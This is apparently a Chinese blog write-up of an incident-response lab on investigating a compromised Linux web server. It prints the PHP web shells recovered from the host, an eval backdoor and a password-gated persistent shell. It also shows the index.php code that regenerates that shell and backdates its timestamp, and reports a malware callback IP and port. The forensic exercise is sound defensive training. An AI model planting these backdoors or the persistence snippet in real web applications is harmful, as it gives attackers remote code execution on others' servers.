第一章-应急响应-Linux入侵排查-玄机靶场

  |  

一个Linux入侵排查的简单靶场记录

题目问题

1
2
3
4
5
1.web目录存在木马,请找到木马的密码提交
2.服务器疑似存在不死马,请找到不死马的密码提交
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交

问题一–web目录存在木马,请找到木马的密码提交

按照题目描述发现1.php里有后门

1
2
root@ip-10-0-10-2:/var/www/html# cat 1.php
<?php eval($_POST[1]);?>

问题二–服务器疑似存在不死马,请找到不死马的密码提交

/var/www/html/.shell.php发现个疑似不死马(很像之前awd里的)

1
<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>

问题三–不死马是通过哪个文件生成的,请提交文件名

继续探索可以发现index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
$path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>

问题四–黑客留下了木马文件,请找出黑客的服务器ip提交

按照描述发现目录有个shell.elf。

把文件拉入微步沙箱分析(主要太菜了,有反调试555)

image-20240623130257292发现连接目的ip为 10.11.55.21

问题五–黑客留下了木马文件,请找出黑客服务器开启的监端口提交

微步沙箱流量包,发现目的端口为3333

image-20240623130408332

文章目录
  1. 题目问题
  2. 问题一–web目录存在木马,请找到木马的密码提交
  3. 问题二–服务器疑似存在不死马,请找到不死马的密码提交
  4. 问题三–不死马是通过哪个文件生成的,请提交文件名
  5. 问题四–黑客留下了木马文件,请找出黑客的服务器ip提交
  6. 问题五–黑客留下了木马文件,请找出黑客服务器开启的监端口提交
|